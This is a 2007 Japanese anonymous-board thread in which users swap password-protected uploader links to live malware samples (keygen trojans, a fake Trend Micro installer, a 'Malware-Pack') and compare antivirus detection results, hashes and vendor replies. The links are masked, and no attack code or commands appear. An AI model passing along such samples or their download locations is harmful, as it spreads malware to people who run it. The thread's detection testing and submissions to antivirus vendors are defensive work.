07/09/02 21:08:47
>>703Kaspersky
ダウンロードしようとしたら
Home / Viruses / Virus Encyclopedia / Malware Descriptions / Classic Viruses / File and Boot Viruses
Password-protected-EXE
Detection added Dec 31 1969 22:59 GMT
Behavior Virus
706:名無しさん@お腹いっぱい。
07/09/02 21:24:30
>>705
㌧
707:名無しさん@お腹いっぱい。
07/09/02 21:30:28
バスタ
CrackingApps Keygen
708:名無しさん@お腹いっぱい。
07/09/02 21:32:58
こういうの見るとNODのヒューリスティックってPanda以下かって思う
結構あんだよね、こういうの
709:名無しさん@お腹いっぱい。
07/09/02 21:33:04
NOD32 v2.7はスルー orz
710:名無しさん@お腹いっぱい。
07/09/02 21:33:31
>>703
Antivir
'TR/Agent.RIR.135 [TR/Agent.RIR.135]'
711:名無しさん@お腹いっぱい。
07/09/02 21:34:01
ゴミ屑を検知しても意味ないw
712:名無しさん@お腹いっぱい。
07/09/02 21:35:21
Keygenの真贋確認させてる
713:名無しさん@お腹いっぱい。
07/09/03 07:12:45
>>703
AVGスルー
検体送りました
714:名無しさん@お腹いっぱい。
07/09/03 08:58:55
>>703
McAfeeスルーヽ(`Д´)ノ
715:名無しさん@お腹いっぱい。
07/09/03 09:45:44
>>708
誤検知も含めてだけど、パンダはヒューステリックが優秀だと思う
716:名無しさん@お腹いっぱい。
07/09/03 15:51:04
>>703
Rising解析結果
1.文件名:Keygen1.exe
不是病毒
717:名無しさん@お腹いっぱい。
07/09/03 17:42:28
誤検知か?
718:名無しさん@お腹いっぱい。
07/09/03 18:18:21
割れ厨うぜぇ。キージェネの鑑定とかは他所でやれや。
719:名無しさん@お腹いっぱい。
07/09/03 19:38:24
キージェネはもうだめぽ。
悪い奴がウイルスを仕込むのに最適の餌食。
ソフトウェアの製造元ーがウイルスを混入してばらまいているかもしれない。
また、あえて、ベンダーが特殊なパッカーでAVで鳴るようなフェイクのジェネを大量にばらまいて
割れザーを混乱させているかもしれない。これは何の罪にもならない。
おわっとるよ。
720:名無しさん@お腹いっぱい。
07/09/03 20:30:32
割れ厨の主張はそれで終わりか?早く死ねよ。
721:名無しさん@お腹いっぱい。
07/09/03 22:18:21
バスター優秀じゃん
722:名無しさん@お腹いっぱい。
07/09/04 00:28:41
>>703
シマンテックに検体送付しました。
723:名無しさん@お腹いっぱい。
07/09/05 00:33:59
ニュイルスとか検体配布するサイト作ったら需要ある?
724:名無しさん@お腹いっぱい。
07/09/05 00:37:09
>>723
それは悪用されるんじゃまいか?
下手したら捕まるんじゃないか?
なんたらかんたら幇助で
725:名無しさん@お腹いっぱい。
07/09/05 00:43:17
なんたらかんたら幇助わらた
726:名無しさん@お腹いっぱい。
07/09/05 11:48:37
でもZIPにパスつければ
727:名無しさん@お腹いっぱい。
07/09/05 21:22:04
URLリンク(www5.uploader.jp)
pass 偽バスター
~トレンドマイクロのニセサイトへ接続し不正なプログラムをダウンロード
させるスパムメールが発見~
----ウイルス情報は下記をご覧ください----
URLリンク(www.trendmicro.co.jp)
ニセの警告メールでトレンドマイクロのニセサイトにおびき寄せ、
不正なプログラム をダウンロードさせる手口が確認されています。ご注意ください。
↑
ブツはこれ GETしたサイトはこれ Firefoxで踏んだら 思いっきり偽装サイト警告でたけどw
↓
URLリンク(www5.uploader.jp)
728:名無しさん@お腹いっぱい。
07/09/05 21:28:47
>>727
㌧。
カスペ7
detected: Trojan program Trojan-Dropper.Win32.Agent.btc File: C:\Users\***\Desktop\tane_uljp00117.zip/TMASInstall_EN_US.exe
118のサイトは全く同じだな。英語だから日本人は警戒するが、
あと、パスワードに、漢字はやめて。w
729:727
07/09/05 21:51:48
URLリンク(www5.uploader.jp)
警告画面もうpしてみた
730:名無しさん@お腹いっぱい。
07/09/06 03:19:11
>>727
Avira AntiVir PersonalEdition Classic
--> TMASInstall_EN_US.exe
[DETECTION] Is the Trojan horse TR/Drop.Agent.btc.1
731:名無しさん@お腹いっぱい。
07/09/06 09:27:13
誰か谷口ウイルスの検体持ってる人いませんか?
持ってたらUPしてほしい・・・
732:名無しさん@お腹いっぱい。
07/09/06 09:35:10
なんだ、お前の会社こんなのもゲットできねーのか
まぁ頑張れ弱小w
733:名無しさん@お腹いっぱい。
07/09/06 09:52:14
頑張れシマンテック
734:名無しさん@お腹いっぱい。
07/09/06 10:26:36
>>727
McAfeeスルーヽ(`Д´)ノ
そしてでかすぎて送れねぇ orz
いまどき3MBはねえだろ、常識的に考えて…
735:名無しさん@お腹いっぱい。
07/09/06 11:18:53
>727
お疲れ様です。
avast! Antivirus未検出の為
提出しておきました。
>734
NODも大き過ぎて検体送れないです・・・(未検出でした
736:名無しさん@お腹いっぱい。
07/09/06 15:33:35
>>727
その検体のどこがウイルスなんだ?
実行してみてもあやしい動きなしのただのTrend Micro製のアンチスパイウェア
ソフトじゃん
737:名無しさん@お腹いっぱい。
07/09/06 15:56:28
ウイルスバスター自体がウイル ry)
738:名無しさん@お腹いっぱい。
07/09/06 15:59:14
>>736
ドロッパーだよ
馬鹿は黙ってろ
739:名無しさん@お腹いっぱい。
07/09/06 16:23:15
谷口はまだ失敗作だと聞いたが。
740:名無しさん@お腹いっぱい。
07/09/06 17:33:11
>>738
でも何にも落ちてこない。
再起動しても変化なし。あやしいプロセスもないし通信もないし
741:名無しさん@お腹いっぱい。
07/09/06 17:35:43
怪しいプロセスもない。
→ルートキットの場合は見えないし、エクスプローラ、Dirでは見えない。
通信もない。
→SVCHOST.EXEや他のプロセスなどで通信することがある。
742:名無しさん@お腹いっぱい。
07/09/06 18:01:09
ルーキット検出系ツール使っても見つからなかった。
AntiSpyは問題なく使えます。
マジでトロイなのかこれ?
743:名無しさん@お腹いっぱい。
07/09/06 18:10:19
NOD対応したじゃん
744:名無しさん@お腹いっぱい。
07/09/06 18:20:23
>>742
お前の知能がしょぼかっただけだよ
いい加減黙ってくれないか?
ここはアンチウイルスが検出するかしないかのスレなんで
745:名無しさん@お腹いっぱい。
07/09/06 18:52:35
【罠】トレンドマイクロさんがウイルス対策ソフトただで配ってるらしいアルよー
スレリンク(news板)
746:名無しさん@お腹いっぱい。
07/09/08 18:25:52
URLリンク(www.dotup.org)
virus
747:名無しさん@お腹いっぱい。
07/09/08 18:57:56
>>746
McAfee
2.exe: Kakkeys
寂しいのう…
748:名無しさん@お腹いっぱい。
07/09/08 19:15:02
>>746
AntiVirに提出したらb.exeをウイルスではないと言ってきた
749:名無しさん@お腹いっぱい。
07/09/08 19:29:03
>>746
㌧。
カスペ7
7/14
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File: 2.exe//Exerb
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File: 3.exe//Exerb
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.t File: 6.exe
detected: Trojan program Trojan.Win32.Delf.zu File: 8.exe
detected: Trojan program Trojan.Win32.Delf.zu File: 9.exe
detected: Trojan program Trojan.Win32.Haradong.ar File: c.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File: e.exe
残り7つは飯食って風呂入ってオナってから検体提出。
これは全部ウイルスかもしれんね。
750:名無しさん@お腹いっぱい。
07/09/08 21:11:06
>>746
Hello,
1.exe_
No malicious code was found in this file.
Please quote all when answering.
--
Best regards, Vladimir Lebedev
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
URLリンク(www.kaspersky.com)
URLリンク(www.kaspersky.com) - free online virus scanner.
URLリンク(www.kaspersky.com) - technical support
カスペのアナリストでは、毒なし。
751:749
07/09/08 21:32:00
>>746
今は、8/14
d.exe追加
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File: 2.exe//Exerb
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File: 3.exe//Exerb
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.t File: 6.exe
detected: Trojan program Trojan.Win32.Delf.zu File: 8.exe
detected: Trojan program Trojan.Win32.Delf.zu File: 9.exe
detected: Trojan program Trojan.Win32.Haradong.ar File: c.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File: e.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File: www.dotup.org0748\a\d.exe
752:名無しさん@お腹いっぱい。
07/09/08 21:37:45
>>746
ウイルスバスター2007(CPR)
D:\SandBox\a\2.exe: TROJ_Generic
D:\SandBox\a\3.exe: TSPY_KAKKEYS.F
D:\SandBox\a\6.exe: TROJ_TANIGU.A
D:\SandBox\a\8.exe: TROJ_Generic
D:\SandBox\a\c.exe: TROJ_HARADONG.BD
D:\SandBox\a\e.exe: TROJ_KILLFILE.DT
検出漏れは送っておきました
753:名無しさん@お腹いっぱい。
07/09/08 21:43:13
>>746
Avira AntiVir PersonalEdition Classic
--> a/3.exe
[DETECTION] Is the Trojan horse TR/Spy.Ruby.Kakkeys.C.1
--> a/8.exe
[DETECTION] Is the Trojan horse TR/Delf.ZU
--> a/9.exe
[DETECTION] Is the Trojan horse TR/Delf.ZU.5
--> a/AntiLo/1/Data_1.exe
[DETECTION] Is the Trojan horse TR/Delf.UN.1
--> a/AntiLo/2/Data_1.exe
[DETECTION] Is the Trojan horse TR/PSW.Delf.CB
--> a/AntiLo/3/Data_1.exe
[DETECTION] Is the Trojan horse TR/Dldr.Agent.bym
--> a/c.exe
[DETECTION] Is the Trojan horse TR/Crypt.CFI.Gen
--> a/d.exe
[DETECTION] Is the Trojan horse TR/Crypt.CFI.Gen
--> a/e.exe
[DETECTION] Is the Trojan horse TR/Crypt.CFI.Gen
残ったのはexe8個、antidojin.rb3個
754:名無しさん@お腹いっぱい。
07/09/08 21:50:28
>>746 1.exeとa.exeは白判定
From: newvirus@kaspersky.com [mailto:newvirus@kaspersky.com]
Sent: Saturday, September 08, 2007 9:44 PM
To:
Subject: RE: Please Inspect This File. A New Malware? [KLAB-2871541]
Hello,
a.exe_
No malicious code was found in this file.
Please quote all when answering.
--
Best regards, Vladimir Lebedev
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
URLリンク(www.kaspersky.com)
755:名無しさん@お腹いっぱい。
07/09/08 21:52:17
>>752
6は谷口かーーーーーーーーーーーーーーー!
756:名無しさん@お腹いっぱい。
07/09/08 21:56:54
>>746
乙
ノートン
2.exe Trojan.Kakkeys.C
3.exe Trojan.Kakkeys.C
8.exe Trojan Horse
9.exe Trojan Horse
c.exe Trojan Horse
d.exe Trojan Horse
e.exe Trojan Horse
他、シマンテックに検体送付しました。
757:名無しさん@お腹いっぱい。
07/09/08 22:01:05
不発といわれているがシェル書き換えでexplorer起動不能にはなるみたいね
Kakkeys系に分類されるのは意外なキモス
758:名無しさん@お腹いっぱい。
07/09/08 22:07:39
ウイルスキラー
D:\virus\www.dotup.org0748\a\8.exe
Trojan.Delf.rky
D:\virus\www.dotup.org0748\a\9.exe
Trojan.Win32.Delf.rtl
2,3,7以外Risingに送付済み
759:名無しさん@お腹いっぱい。
07/09/08 22:35:21
>>746
1.exe URLリンク(www.virustotal.com)
2.exe URLリンク(www.virustotal.com)
3.exe URLリンク(www.virustotal.com)
4.exe URLリンク(www.virustotal.com)
5.exe URLリンク(www.virustotal.com)
6.exe URLリンク(www.virustotal.com)
7.exe URLリンク(www.virustotal.com)
8.exe URLリンク(www.virustotal.com)
9.exe URLリンク(www.virustotal.com)
a.exe URLリンク(www.virustotal.com)
b.exe URLリンク(www.virustotal.com)
c.exe URLリンク(www.virustotal.com)
d.exe URLリンク(www.virustotal.com)
e.exe URLリンク(www.virustotal.com)
760:名無しさん@お腹いっぱい。
07/09/08 23:58:51
>746
お疲れ様です!!!。
塊のままスキャンした結果です。
URLリンク(www7.uploader.jp)
URLリンク(www7.uploader.jp)
761:名無しさん@お腹いっぱい。
07/09/09 00:36:19
>>746
まだ送ってないのにキングが7つほど検出したのでビックリ
762:名無しさん@お腹いっぱい。
07/09/09 00:46:22
>>746
NOD32 6つ
時間 モジュール 対象 名前
2007/09/09 0:36:56 AMON ファイル Y:\a\c.exe Win32/Haradong.AR トロイ
2007/09/09 0:36:55 AMON ファイル Y:\a\e.exe Win32/Haradong トロイ の亜種
2007/09/09 0:36:54 AMON ファイル Y:\a\d.exe Win32/Haradong トロイ の亜種
2007/09/09 0:36:53 AMON ファイル Y:\a\9.exe ウイルスの可能性 : NewHeur_PE ウイルス (シグネチャなしで検知)
2007/09/09 0:36:51 AMON ファイル Y:\a\8.exe ウイルスの可能性 : NewHeur_PE ウイルス (シグネチャなしで検知)
2007/09/09 0:36:48 AMON ファイル Y:\a\3.exe Win32/Kakkeys.C トロイ
カスペとの違い
NOD32未検出・・・2.exeと6.exe
カスペ未検出・・・・d.exe
763:名無しさん@お腹いっぱい。
07/09/09 01:10:15
>>727
NOD32 1つ
時間 モジュール 対象 名前
2007/09/09 1:07:14 AMON ファイル Y:\tane_uljp00117\TMASInstall_EN_US.exe Win32/TrojanDropper.Agent.BTC トロイ
764:名無しさん@お腹いっぱい。
07/09/09 03:23:21
>>746
カスペ7
9/14(うち2は白、待ちは3)
1.exe: No malicious code was found.
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File:a\2.exe//Exerb
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File:a\3.exe//Exerb
4.exe 解析待ち(Ewido,,Prev1で陽性反応) Kakkey?
5.exe 解析待ち(Ewido,,Prev1で陽性反応) Kakkey ?
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.t File:a\6.exe
detected: Trojan program Trojan.Win32.VB.aqk File:a\7.exe (NEW)
detected: Trojan program Trojan.Win32.Delf.zu File:a\8.exe
detected: Trojan program Trojan.Win32.Delf.zu File:a\9.exe
a.exe No maicious code was found
b.exe 送るの忘れてたwww。俺ワロス。
detected: Trojan program Trojan.Win32.Haradong.ar File:a\c.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File:a\d.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File:a\e.exe
もう一回送るか?(4,5,b)
7.exeは返事が来ないけれど、いつの間にか検知という悲しいパターン。
サンキューメールがもらえないってのは、(TOT)
時間がかかるね、日ロ関係を悪化させない程度にフォローしてみるか?
でかいけれど、萌え動画が入っているのか?
ロシア人、日本の検体に失笑。
765:名無しさん@お腹いっぱい。
07/09/09 04:17:02
おまいらny系だと食いつきいいなあw
766:名無しさん@お腹いっぱい。
07/09/09 10:07:24
P2Pなんジョングってもないしテーハミンとも思わグックない
767:名無しさん@お腹いっぱい。
07/09/09 11:18:03
AVG IS
2.exe Logger.kakkeys.c
6.exe Virus identified Worm/Generic.DHG
7.exe Trojan.Regspy
8.exe Trojan horse Generic3.FGC
9.exe Trojan horse Generic5.QET
c.exe Virus identified Worm/VB.BRG
d.exe Virus identified Worm/VB.CEM
e.exe Trojan horse Generic7.ATT
768:名無しさん@お腹いっぱい。
07/09/09 12:40:23
>>762
「~ の亜種」
もNewHeur_PEとおなじでヒューリスティックで検知だったかと。
まえ試したときはヒューリスティックのみで手動検査ができたから、いまも試せると思うけど。
769:名無しさん@お腹いっぱい。
07/09/09 13:57:35
当たり前だが、P2Pで流通しているウイルスの検知率だと、
公式結果の検出率の半分か3分の1くらいに落ちるね。
やっぱりP2Pの世界は特殊だね。
世間で優秀なAVなら、nyでエロゲダウンしても検知しなければ大丈夫とか
複数のAVで検知しなかったから完璧と思ってるバカが世の中に多いから。
nyで実行ファイルダウンするのは自殺行為なのにね。
770:758
07/09/09 14:07:04
>>746
? 1.文件名:4.exe
? 不是病毒
? 1.文件名:a.exe
? 不是病毒
771:名無しさん@お腹いっぱい。
07/09/09 14:22:57
AntiVirが6.39.1.106で6.exeに対応。TR/Spy.Ruby.Kakkeys.Tとして検出。
土日だから他のは月曜かなあ。
772:770
07/09/09 14:38:05
>>746
1.文件名:b.exe
不是病毒
1.文件名:5.exe
不是病毒
773:名無しさん@お腹いっぱい。
07/09/09 16:34:26
みんなどうやってそんなにウイルスを手に入れてるの?
P2Pでエロゲーを落としてくればちょこちょこ入ってるものなの?
774:名無しさん@お腹いっぱい。
07/09/09 17:55:47
乞食かw
775:名無しさん@お腹いっぱい。
07/09/09 18:04:34
honeypot
776:名無しさん@お腹いっぱい。
07/09/09 21:42:01
なんてな
777:名無しさん@お腹いっぱい。
07/09/10 15:55:08
>>746
カスペ
b.exe
Hello.
Trojan.Win32.Shutdowner.bm
Detection for this malware has been added to the next antiviral bases update.
--
Regards, Alexey Malyshev
Virus analyst, Kaspersky Lab.
778:名無しさん@お腹いっぱい。
07/09/10 16:07:04
>>746
消えてる><
もっかいあげてもらえませんか?
779:名無しさん@お腹いっぱい。
07/09/10 16:33:42
>>778
URLリンク(www.dotup.org)
virus
何処のソフト使ってるのか教えてほしい。
後、結果と
780:772
07/09/10 16:48:55
>>746
1.文件名:6.exe
病毒名:Trojan.Win32.Agent.yer
1.文件名:1.exe
病毒名:Trojan.Clicker.Win32.Agent.agq
2.文件名:c.exe
病毒名:Trojan.Win32.KillFiles.mw
3.文件名:d.exe
病毒名:Harm.Win32.KillFiles.d
4.文件名:e.exe
病毒名:Harm.Win32.KillFiles.c
送ったのは以上
>>772と言われたが検出
5.exe
Trojan.Win32.Agent.yet
b.exe
Trojan.Win32.ShutDown.ew
781:名無しさん@お腹いっぱい。
07/09/10 16:55:21
>>746
ちょ!Aviraから解析結果来たけれど
1.exeとb.exeはクリーンだと・・・
782:名無しさん@お腹いっぱい。
07/09/10 18:20:52
URLリンク(www5.uploader.jp)
pass: Malware-Pack
いろいろ詰め合わせ
McAfeeには提出済み
783:名無しさん@お腹いっぱい。
07/09/10 18:38:03
>>782
AVG
C:\WINDOWS\デスクトップ\malware\4\ing.htm
Virus found JS/Downloader.Agent
C:\WINDOWS\デスクトップ\malware\9\k.exe
Trojan horse PSW.Lineage.ZB
C:\WINDOWS\デスクトップ\malware\a\tmp.htm
Virus found Exploit
C:\WINDOWS\デスクトップ\malware\b\chat.com
Trojan horse Generic7.JHY
C:\WINDOWS\デスクトップ\malware\e\VideoAccessCodecInstall.exe
Trojan horse Downloader.Zlob
残りは送りました
784:名無しさん@お腹いっぱい。
07/09/10 18:52:59
ウイルスキラー
3\haha.js
Trojan.DL.JS.Agent.lmr
7\ad.htm
Trojan.DL.JS.Agent.lkx
9\k.exe>>packlz>>upx_c
Trojan.PSW.Win32.QMOnline.b
Risingに送りました
785:名無しさん@お腹いっぱい。
07/09/10 18:55:38
>>782
お疲れ様です。
avast!に未検出ファイルを提出しておきました
786:名無しさん@お腹いっぱい。
07/09/10 19:05:18
>>785
いや、そこはどれをなんて名前で検出したか書くとこだろ
787:名無しさん@お腹いっぱい。
07/09/10 19:16:47
NODは2個しか検出しなかった上にえらいスキャンに時間がかかった
検出したのは9とbだけ
788:名無しさん@お腹いっぱい。
07/09/10 20:03:46
>>782
カスペ7
5/14
(1、4,7,9、b)
スルー多い。
検体提出します。
detected: Trojan program Trojan-Downloader.JS.Agent.no File: 1/n404-1.htm
detected: Trojan program Trojan-Downloader.JS.Agent.nv File: 4/ing.htm
detected: Trojan program Trojan-Downloader.JS.Psyme.ko File: 7/ad.htm
detected: Trojan program Trojan-PSW.Win32.OnLineGames.cdo File: 9/k.exe//BeRo//PE_Patch.UPX//UPX//PE_Patch.MaskPE
detected: Trojan program Trojan-PSW.Win32.Magania.zz File: b/chat.com//data.rar/2.sfx.exe//data.rar/2.exe
789:名無しさん@お腹いっぱい。
07/09/10 20:22:38
>>782
Norton Internet Security2007
codec.exeをDownloaderとして検知
残りは贈っときます
790:名無しさん@お腹いっぱい。
07/09/10 20:46:27
>>782
ウイルスバスター2007
codec.exe
TROJ_ZLOB.CYI
haha.js
JS_DLOADER.PSJ
k.exe
TROJ_SYSTEMHI.CT
VideoAccessCodecInstall.exe
TROJ_ZLOB.DSW
検出しなかったものを提出しました。
791:名無しさん@お腹いっぱい。
07/09/10 21:12:40
>>782
カスペ6 2007/09/10 20:03:01
a tmp.htm
c file.exe
d file.exe
e VideoAccessCodecInstall.exe
以外検出
792:791
07/09/10 21:28:47
訂正
カスペ6 - 2007/09/10 20:03:11
後、VideoAccessCodecInstall.exe は、一週間程観察してたけど、Genericパターンで対応できないソフトは検出できない。
バイナリが2時間毎に変わるので、検体を提出しても無意味。
今のところ、AVG、BitDefender、Microsoft、Sophos、Trend Micro しか検出できない。
793:791
07/09/10 21:34:48
嗚呼、ゴミン。
カスペ6 >>788 と同じ(解凍中に中断してた……)。
794:名無しさん@お腹いっぱい。
07/09/10 21:42:32
>>>746
カスペから遅い返事
5.exe
Hello !
This is a new variant of Trojan-Spy.Ruby.Kakkeys Detection will be added in next update.
Thank you !
カスペ7
11/14(うち2は白、待ちは1)
1.exe: No malicious code was found.
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File:a\2.exe//Exerb
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File:a\3.exe//Exerb
4.exe 解析待ち(Ewido,,Prev1で陽性反応) Kakkey?
5.exe Trojan-Spy.Ruby.Kakkeys
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.t File:a\6.exe
detected: Trojan program Trojan.Win32.VB.aqk File:a\7.exe (NEW)
detected: Trojan program Trojan.Win32.Delf.zu File:a\8.exe
detected: Trojan program Trojan.Win32.Delf.zu File:a\9.exe
a.exe No maicious code was found
b.exe Trojan.Win32.Shutdowner.bm
detected: Trojan program Trojan.Win32.Haradong.ar File:a\c.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File:a\d.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File:a\e.ex
795:名無しさん@お腹いっぱい。
07/09/10 22:22:04
ついでにこれもドゾー
URLリンク(www5.uploader.jp)
pass NFL
URLリンク(www.f-secure.com)
↑
これ NFLとかうちら関係ないけどアメリカ産ベンダ未対応が多いんで送ってやってや~
796:名無しさん@お腹いっぱい。
07/09/10 22:45:04
>795
URLリンク(www7.uploader.jp)
URLリンク(www7.uploader.jp)
orz
797:名無しさん@お腹いっぱい。
07/09/10 22:45:27
>>795
AVG
Virus found Downloader.Tibs検出
798:名無しさん@お腹いっぱい。
07/09/10 23:22:01
J-COM相模原4/7火病デビューログ 晒しage
欠陥商品ウイルスバスター擁護でフルボッコ
「500」「バスター厨」「相模原」粘着荒らし総合スレ
スレリンク(sec板:616-625番)
799:名無しさん@お腹いっぱい。
07/09/10 23:48:04
>>795
ノートン反応
Trojan.Packed.13
800:名無しさん@お腹いっぱい。
07/09/10 23:55:11
これな
URLリンク(itpro.nikkeibp.co.jp)
Packed.13にはモルヒネつかわれてるようだ
801:名無しさん@お腹いっぱい。
07/09/11 00:34:51
URLリンク(antispydownloads.org)
日本人狙う偽セキュリティソフト「MalwareBurn」、ウェブルートが警告
URLリンク(internet.watch.impress.co.jp)
URLリンク(www.virustotal.com)
Aviraに検体提出しました
802:名無しさん@お腹いっぱい。
07/09/11 00:58:40
>>801
Symantecに通報済み
803:788
07/09/11 01:07:12
>>782
カスペ 12/14 (14のうち、白1、回答待ち1)
追加検知検体
haha1.js_ - Trojan-Downloader.JS.Agent.ol
haha2.js_ - Trojan-Downloader.JS.Agent.ol,
vip.js_ - Trojan-Downloader.JS.Agent.ok
file.exe- Trojan.Win32.Agent.bar
file2.exe_ - Trojan-Downloader.Win32.Small.fqi
mp3 - Trojan-Downloader.JS.Agent.om
tmp.htm - Exploit.HTML.IESlice.x
問題なし?
codec.exe - No malicious software was found in the attached file.
回答待ち
VideoAccessCodecInstall.exe- 回答待ち
804:名無しさん@お腹いっぱい。
07/09/11 01:13:38
Aviraうpデートできねー
検体送る気にもならんわ
805:名無しさん@お腹いっぱい。
07/09/11 01:36:42
Avira AntiVir PersonalEdition Classic
VDF version internet: 6.39.1.112
--> malware/1/n404-1.htm
[DETECTION] Contains detection pattern of the HTML script virus HTML/Crypted.Gen
--> malware/2/codec.exe
[DETECTION] Contains detection pattern of the dropper DR/Agent.114628
--> malware/4/ing.htm
[DETECTION] Is the Trojan horse TR/Dldr.Agent.NV.6
--> malware/7/ad.htm
[DETECTION] Is the Trojan horse TR/Dldr.Psyme.KO.1
--> malware/9/k.exe
[DETECTION] Is the Trojan horse TR/Drop.Lineage.ACN
--> malware/a/tmp.htm
[DETECTION] Contains detection pattern of the HTML script virus HTML/Dldr.Agen.AJ.8
--> malware/b/chat.com
[1] Archive type: RAR SFX (self extracting)
--> 2.sfx.exe
[2] Archive type: RAR SFX (self extracting)
--> 2.exe
[DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
--> malware/c/file.exe
[DETECTION] Is the Trojan horse TR/Crypt.XPACK.Gen
--> malware/d/file.exe
[DETECTION] Is the Trojan horse TR/Crypt.XPACK.Gen
--> malware/e/VideoAccessCodecInstall.exe
[DETECTION] Contains detection pattern of the dropper DR/Dldr.Zlob.AANT.1
未検出 0.3.5.6.8
806:名無しさん@お腹いっぱい。
07/09/11 01:44:39
>>795
追加
--> tracker.exe
[DETECTION] Contains detection pattern of the worm WORM/Storm.tcn
807:名無しさん@お腹いっぱい。
07/09/11 02:10:05
>>795
>>801
ウイルスバスター(CPR)でスルー
検体送付済み
808:名無しさん@お腹いっぱい。
07/09/11 09:33:06
>>795
McAfee: ヽ(`Д´)ノ
WebImmuneに提出したら近いうちにTibs-Packedとして対応するらしい
>>801
スルーヽ(`Д´)ノ
でかすぎて送れねえヽ(`Д´)ノ
809:名無しさん@お腹いっぱい。
07/09/11 12:08:48
>>808
>>801は7-zipで開くとMalwareBurn 7.1.exeで
1.53MBだと送れないかな?
MD5:
65E9A700AAD9E0CCD6EC82750E606346
SHA1:
AD764A0D3E835A34A384DDD90D8F4508304C36E9
810:名無しさん@お腹いっぱい。
07/09/11 12:10:00
7-zipで開いてファイル毎に送るとかね。
811:名無しさん@お腹いっぱい。
07/09/11 14:42:21
>>801
Avast(VPS774-1)は検出
Win32:Spycrush [Tool]
812:名無しさん@お腹いっぱい。
07/09/11 15:17:16
>>801
URLリンク(www.virustotal.com)
File mb_install.exe received on 09.11.2007 07:59:56 (CET)
Result: 3/31 (9.68%)
Avast 4.7.1043.0 2007.09.10 Win32:Spycrush
Kaspersky 4.0.2.24 2007.09.11 not-a-virus:FraudTool.Win32.MalwareBurn.a
Symantec 10 2007.09.11 MalwareBurn
File size: 3300227 bytes
MD5: b5c6857e91ab15aff90145d8701b4fd3
SHA1: e8c61d7870039ef42496d7addd7e3707faf366bf
packers: BINARYRES
813:名無しさん@お腹いっぱい。
07/09/11 15:19:11
>>801
avast!対応済み。
URLリンク(www.crazyclits.com)
814:名無しさん@お腹いっぱい。
07/09/11 16:28:10
>>795
Rising
1.文件名:tracker.exe
病毒名:Rootkit.Win32.Agent.ngz
815:名無しさん@お腹いっぱい。
07/09/11 22:15:32
>>813
氏ねよヴォケ!
816:788=803
07/09/12 03:36:29
>>746
今返事北産業
カスペ7
From: newvirus@kaspersky.com [mailto:newvirus@kaspersky.com]
Sent: Wednesday, September 12, 2007 3:05 AM
Subject: RE: A New Malware? Please Inspect This File. [KLAB-2885407]
Hello,
VideoAccessCodecInstall.exe_ - Trojan-Downloader.Win32.Zlob.cmh
New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.
Please quote all when answering.
Best regards, Vyacheslav Zakorzhevsky
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
URLリンク(www.kaspersky.com)
ちと時間がかかった。ザコルツヘブスキー君。Zlob
最初5/14→提出後12/14(2個は白~1.exe, a.exe)
5/12=41.7% orz
817:名無しさん@お腹いっぱい。
07/09/12 03:44:00
カスペ7
>>795
detected: riskware not-a-virus:FraudTool.Win32.MalwareBurn.a File: mb_install.exe//data0007
>>801
detected: virus Packed.Win32.Tibs.bt File:tane_uljp00127.zip/tracker.exe
818:名無しさん@お腹いっぱい。
07/09/12 06:03:23
>>801
Avira検出
DR/FraudTool.MalwareBurn.A
819:名無しさん@お腹いっぱい。
07/09/12 14:15:58
>>817
カスペGJ
820:名無しさん@お腹いっぱい。
07/09/12 21:36:36
アンカーBJ
821:名無しさん@お腹いっぱい。
07/09/13 18:24:30
URLリンク(www.dotup.org)
virus
山田とか騒がれてるが
822:名無しさん@お腹いっぱい。
07/09/13 18:48:10
ただのjpgとgif詰め合わせの自己解凍書庫
823:名無しさん@お腹いっぱい。
07/09/13 19:04:55
>>821
自分で解凍もできんのか?
見りゃウイルスじゃないことぐらい分かるだろが
824:名無しさん@お腹いっぱい。
07/09/15 18:25:04
検体:>>746
カスペ7
4.exeについて一週間ぶりに返事キタ━━━(゜∀゜)━━━ !!。
でも、遅い。糞詰まりでも起こしているのか?ヽ(`Д´)ノウワァァン!!
-----------------------------------------------------------
From: newvirus@kaspersky.com [mailto:newvirus@kaspersky.com]
Sent: Saturday, September 15, 2007 1:26 PM
Subject: RE: Please Inspect This File. A New Malware? [KLAB-2871286]
Hello,
4.exe - Trojan-Spy.Ruby.Kakkeys.u
New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.
Please quote all when answering.
---------------------------------------------------------
結論
5/14→12/14(うち2は白,。1.exeとa.exe)
2.exe : Trojan program Trojan-Spy.Ruby.Kakkeys.c
3.exe : Trojan program Trojan-Spy.Ruby.Kakkeys.c
4.exe Trojan-Spy.Ruby.Kakkeys.u
5.exe Trojan-Spy.Ruby.Kakkeys
6.exe : Trojan program Trojan-Spy.Ruby.Kakkeys.t
7.exe : Trojan program Trojan.Win32.VB.aqk
8.exe : Trojan program Trojan.Win32.Delf.zu
9.exe : Trojan program Trojan.Win32.Delf.zu
b.exe Trojan.Win32.Shutdowner.bm
c.exe: Trojan program Trojan.Win32.Haradong.ar
d.exe: Trojan program Trojan.Win32.KillFiles.ki
e.exe: Trojan program Trojan.Win32.KillFiles.ki
825:名無しさん@お腹いっぱい。
07/09/15 23:03:01
カスペ厨必死だなw
826:名無しさん@お腹いっぱい。
07/09/15 23:04:26
出張すんな
